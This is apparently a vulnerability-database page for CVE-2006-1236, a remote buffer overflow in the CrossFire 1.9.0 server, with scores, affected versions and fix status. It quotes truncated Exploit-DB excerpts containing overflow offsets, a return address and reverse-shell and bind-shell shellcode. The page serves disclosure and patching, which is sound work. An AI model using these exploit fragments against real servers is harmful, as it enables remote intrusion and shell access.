CVE-2006-1236
published 2006-03-15CVE-2006-1236: Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command…
PriorityP349high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
27.40%
97.8th percentile
Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| crossfire | crossfire | — | — |
| crossfire | crossfire | >= 0 < 1.9.0-2 | 1.9.0-2 |
| crossfire | crossfire | >= 0 < 1.9.0-2 | 1.9.0-2 |
| crossfire | crossfire | >= 0 < 1.9.0-2 | 1.9.0-2 |
| crossfire | crossfire | >= 0 < 1.9.0-2 | 1.9.0-2 |
| debian | crossfire | < crossfire 1.9.0-2 (bookworm) | crossfire 1.9.0-2 (bookworm) |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv6.4MEDIUM
vendor_debian6.4MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-3hxr-9gc8-927w: Buffer overflow in the SetUp function in socket/request
ghsa_unreviewed·2022-05-01·CVSS 6.4
CVE-2006-1236 [MEDIUM] GHSA-3hxr-9gc8-927w: Buffer overflow in the SetUp function in socket/request
Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010.
OSV
CVE-2006-1236: Buffer overflow in the SetUp function in socket/request
osv·2006-03-15·CVSS 6.4
CVE-2006-1236 [MEDIUM] CVE-2006-1236: Buffer overflow in the SetUp function in socket/request
Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010.
Debian
CVE-2006-1236: crossfire - Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 all...
vendor_debian·2006·CVSS 6.4
CVE-2006-1236 [MEDIUM] CVE-2006-1236: crossfire - Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 all...
Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010.
Scope: local
bookworm: resolved (fixed in 1.9.0-2)
bullseye: resolved (fixed in 1.9.0-2)
forky: resolved (fixed in 1.9.0-2)
sid: resolved (fixed in 1.9.0-2)
trixie: resolved (fixed in 1.9.0-2)
No detection rules found.
Exploit-DB
crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
exploitdb·2021-08-18·CVSS 7.5
CVE-2006-1236 [HIGH] crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
---
# Exploit Title: crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
# Exploit Author: Khaled Salem @Khaled0x07
# Software Link: https://www.exploit-db.com/apps/43240af83a4414d2dcc19fff3af31a63-crossfire-1.9.0.tar.gz
# Version: 1.9.0
# Tested on: Kali Linux 2020.4
# CVE : CVE-2006-1236
#!/bin/python
import socket
import time
# Crash at 4379
# EIP Offset at 4368
# Badchar \x00\x20
# ECX Size 170
# CALL ECX 0x080640eb
size = 4379
# Attacker IP: 127.0.0.1 Port: 443
shellcode = b""
shellcode += b"\xd9\xee\xd9\x74\x24\xf4\xb8\x60\x61\x5f\x28"
shellcode += b"\x5b\x33\xc9\xb1\x12\x31\x43\x17\x03\x43\x17"
shellcode += b"\x83\xa3\x65\xbd\xdd\x12\xbd\xb6\xfd\x07\x02"
shellcode += b"\x6a\x68\xa5\x0d\x6d\xdc\xcf\xc0\xee\x8e\x56
Exploit-DB
crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
exploitdb·2006-03-13
CVE-2006-1236 crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
---
// crossfire-server
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 13327 // default port
#define SC_PORT 33333 // default shellcode port
#define SC_HOST "127.0.0.1" // default shellcode host
unsigned char sc_cb[] = // izik's
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd"
"\x80\x5b\x5d\xbeHOST\xf7\xd6\x56\x66\xbdPR\x0f\xcd\x09\xdd"
"\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9"
"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf";
unsigned char sc_bind[] = // izik's
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd"
"\x80\x5b\x5d\x52\x66\xbdPR\x0f\xcd\x09\xdd\x55\x6a\x10\x51"
"\x50\x89\xe1\xb0\x6
No writeups or analysis indexed.
http://cvs.sourceforge.net/viewcvs.py/crossfire/crossfire/socket/request.c?rev=1.86&view=loghttp://packetstormsecurity.com/files/163873/Crossfire-Server-1.0-Buffer-Overflow.htmlhttp://secunia.com/advisories/19237http://secunia.com/advisories/19276http://www.debian.org/security/2006/dsa-1009http://www.osvdb.org/23904http://www.securityfocus.com/bid/17093http://www.vupen.com/english/advisories/2006/0951https://exchange.xforce.ibmcloud.com/vulnerabilities/25252https://www.exploit-db.com/exploits/1582http://cvs.sourceforge.net/viewcvs.py/crossfire/crossfire/socket/request.c?rev=1.86&view=loghttp://packetstormsecurity.com/files/163873/Crossfire-Server-1.0-Buffer-Overflow.htmlhttp://secunia.com/advisories/19237http://secunia.com/advisories/19276http://www.debian.org/security/2006/dsa-1009http://www.osvdb.org/23904http://www.securityfocus.com/bid/17093http://www.vupen.com/english/advisories/2006/0951https://exchange.xforce.ibmcloud.com/vulnerabilities/25252https://www.exploit-db.com/exploits/1582
2006-03-15
Published